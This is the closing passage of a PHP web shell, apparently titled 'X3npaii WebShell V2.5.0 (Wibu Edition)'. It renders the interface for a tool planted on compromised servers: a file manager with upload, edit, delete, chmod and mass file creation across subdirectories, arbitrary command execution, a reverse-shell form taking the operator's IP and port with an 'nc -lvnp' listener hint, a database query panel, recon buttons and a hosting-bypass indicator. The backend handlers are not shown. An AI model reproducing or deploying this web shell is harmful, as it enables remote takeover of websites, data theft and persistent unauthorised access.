                document.querySelectorAll(".tab-button").forEach(btn => {
                    btn.classList.remove("active");
                });
                document.getElementById(tabId).classList.add("active");
                event.currentTarget.classList.add("active");
            }
            function selectAllFiles(source) {
                const checkboxes = document.querySelectorAll("input[name=\'sel[]\']");
                checkboxes.forEach(checkbox => {
                    checkbox.checked = source.checked;
                });
            }
        </script>
    </head>
    <body>
        <div class="wrapper">
            <div class="header">
                <h1>X3npaii WebShell V2.5.0 <span style="font-size:0.7rem;color:#aaa;">(Wibu Edition)</span></h1>
                <div class="info">
                    <span>OS: '.htmlspecialchars(php_uname()).'</span>
                    <span>PHP: '.phpversion().'</span>
                    <span>Bypass: LiteSpeed='.$is_litespeed.'</span>
                </div>
            </div>
            <div class="message-container">
                '.$message.'
            </div>
            <div class="container">
                <div class="panel">
                    <h2>File Manager</h2>
                    <div class="tab-container">
                        <div class="tab-buttons">
                            <button class="tab-button active" onclick="showTab(\'file-explorer\')">Explorer</button>
                            <button class="tab-button" onclick="showTab(\'file-upload\')">Upload</button>
                            <button class="tab-button" onclick="showTab(\'file-ops\')">Operations</button>
                        </div>
                        <div id="file-explorer" class="tab-content active">
                            <form method="GET">
                                <input type="text" name="path" value="'.htmlspecialchars($current_dir).'" placeholder="Path">
                                <button type="submit">Go</button>
                            </form>
                            <table class="file-list">
                                <thead>
                                    <tr>
                                        <th><input type="checkbox" onclick="selectAllFiles(this)"></th>
                                        <th>Name</th>
                                        <th>Size</th>
                                        <th>Perms</th>
                                        <th>Actions</th>
                                    </tr>
                                </thead>
                                <tbody>
                                    <tr>
                                        <td></td>
                                        <td><a href="?path='.urlencode(dirname($current_dir)).'">.. (Parent)</a></td>
                                        <td></td>
                                        <td></td>
                                        <td></td>
                                    </tr>';
                                    // List files and directories
                                    $files = @scandir($current_dir);
                                    if ($files) {
                                        foreach ($files as $file) {
                                            if ($file == '.' || $file == '..') continue;
                                            $full_path = $current_dir . '/' . $file;
                                            $is_dir = @is_dir($full_path);
                                            $size = $is_dir ? '-' : format_size(@filesize($full_path));
                                            $perms = substr(sprintf('%o', @fileperms($full_path)), -4);
                                            echo '<tr>
                                                <td><input type="checkbox" name="sel[]" value="'.htmlspecialchars($file).'"></td>
                                                <td>';
                                            if ($is_dir) {
                                                echo '<a href="?path='.urlencode($full_path).'">'.htmlspecialchars($file).'/</a>';
                                            } else {
                                                echo htmlspecialchars($file);
                                            }
                                            echo '</td>
                                                <td>'.$size.'</td>
                                                <td>'.$perms.'</td>
                                                <td class="file-actions">';
                                            if (!$is_dir) {
                                                echo '<a href="?path='.urlencode($current_dir).'&download='.urlencode($file).'">Download</a>';
                                                echo '<a href="?path='.urlencode($current_dir).'&edit='.urlencode($file).'">Edit</a>';
                                                if (preg_match('/\.(zip|rar|tar|gz)$/i', $file)) {
                                                    echo '<a href="?path='.urlencode($current_dir).'&extract='.urlencode($file).'">Extract</a>';
                                                }
                                            }
                                            echo '<a href="?path='.urlencode($current_dir).'&delete='.urlencode($file).'" onclick="return confirm(\'Are you sure?\')">Delete</a>
                                                </td>
                                            </tr>';
                                        }
                                    }
                                    echo '
                                </tbody>
                            </table>
                            <form method="POST">
                                <input type="hidden" name="path" value="'.htmlspecialchars($current_dir).'">
                                <div style="display: flex; gap: 10px; align-items: center; margin-bottom: 15px;">
                                    <span>Selected:</span>
                                    <select name="action" style="flex: 1;">
                                        <option value="delete">Delete</option>
                                        <option value="chmod">Change Permissions</option>
                                        <option value="rename">Rename</option>
                                        <option value="move">Move To</option>
                                    </select>
                                </div>
                                <input type="text" name="action_value" placeholder="New name/permissions/path">
                                <button type="submit" name="file_action">Execute</button>
                            </form>
                        </div>
                        <div id="file-upload" class="tab-content">
                            <form method="POST" enctype="multipart/form-data">
                                <input type="file" name="upload" style="margin-bottom: 15px;">
                                <button type="submit" name="upload_file">Upload</button>
                            </form>
                            <form method="POST">
                                <input type="text" name="newfile" placeholder="New filename">
                                <button type="submit">Create File</button>
                            </form>
                            <form method="POST">
                                <input type="text" name="newdir" placeholder="New directory name">
                                <button type="submit">Create Directory</button>
                            </form>
                        </div>
                        <div id="file-ops" class="tab-content">
                            <form method="POST">
                                <h3 style="margin-bottom: 10px;">Mass File Creation</h3>
                                <input type="text" name="mass_filename" placeholder="Filename to create" required>
                                <textarea name="mass_note" placeholder="File content" rows="3"></textarea>
                                <button type="submit" name="mass_create">Create in All Subdirectories</button>
                            </form>
                            <div style="margin-top: 15px;">
                                <h3 style="margin-bottom: 10px;">Shell Lock</h3>
                                <div style="display: flex; gap: 10px;">
                                    <a href="?lock=enable" class="button">Enable Lock</a>
                                    <a href="?lock=disable" class="button">Disable Lock</a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="panel">
                    <h2>Command Execution</h2>
                    <form method="POST">
                        <input type="text" name="exec" placeholder="Command" value="'.(isset($_POST['exec']) ? htmlspecialchars($_POST['exec']) : '').'">
                        <button type="submit">Execute</button>
                    </form>';
                    if (!empty($cmd_output)) {
                        echo '<div class="terminal-output"><pre>'.htmlspecialchars($cmd_output).'</pre></div>';
                    }
                    echo '
                    <div class="tab-container">
                        <div class="tab-buttons">
                            <button class="tab-button active" onclick="showTab(\'reverse-shell\')">Reverse Shell</button>
                            <button class="tab-button" onclick="showTab(\'db-manager\')">Database</button>
                        </div>
                        <div id="reverse-shell" class="tab-content active">
                            <form method="POST">
                                <input type="text" name="ip" placeholder="Your IP" required>
                                <input type="text" name="port" placeholder="Port" required>
                                <button type="submit" name="reverse_shell">Connect</button>
                            </form>
                            <p style="margin-top: 10px; font-size: 0.8rem; color: #aaa;">Example: nc -lvnp [PORT] to listen</p>
                        </div>
                        <div id="db-manager" class="tab-content">
                            <form method="POST">
                                <input type="text" name="db_host" placeholder="Host" value="localhost">
                                <input type="text" name="db_user" placeholder="Username">
                                <input type="password" name="db_pass" placeholder="Password">
                                <input type="text" name="db_name" placeholder="Database">
                                <textarea name="db_query" placeholder="SQL Query" rows="3">SELECT * FROM users LIMIT 10;</textarea>
                                <button type="submit" name="db_manager">Execute</button>
                            </form>
                        </div>
                    </div>
                </div>
                <div class="panel">
                    <h2>Quick Actions</h2>
                    <div class="quick-commands">
                        <button type="submit" form="quick-cmd" name="exec" value="id">id</button>
                        <button type="submit" form="quick-cmd" name="exec" value="uname -a">uname -a</button>
                        <button type="submit" form="quick-cmd" name="exec" value="pwd">pwd</button>
                        <button type="submit" form="quick-cmd" name="exec" value="ls -la">ls -la</button>
                        <button type="submit" form="quick-cmd" name="exec" value="df -h">df -h</button>
                        <button type="submit" form="quick-cmd" name="exec" value="free -m">free -m</button>
                        <button type="submit" form="quick-cmd" name="exec" value="phpinfo();">phpinfo()</button>
                        <button type="submit" form="quick-cmd" name="exec" value="print_r(get_defined_functions());">Functions</button>
                    </div>
                    <form id="quick-cmd" method="POST" style="display: none;"></form>
                    <div style="margin-top: 15px;">
                        <h3 style="margin-bottom: 10px;">Server Info</h3>
                        <div style="background: rgba(0, 0, 0, 0.3); padding: 10px; border-radius: 8px; font-family: monospace; font-size: 0.8rem;">
                            <div>OS: '.php_uname().'</div>
                            <div>PHP: '.phpversion().'</div>
                            <div>Server: '.@$_SERVER['SERVER_SOFTWARE'].'</div>
                            <div>User: '.@get_current_user().'</div>
                            <div>Disabled: '.@ini_get('disable_functions').'</div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="footer">
                X3npaii WebShell V2.5.0 - Wibu Edition | Access Count: '.$access_count.' | '.date('Y-m-d H:i:s').'
            </div>
        </div>
        <img src="https://i.imgur.com/5a4e8a8f7a5.png " class="anime-char" alt="Anime Character">
    </body>
    </html>';
}
?>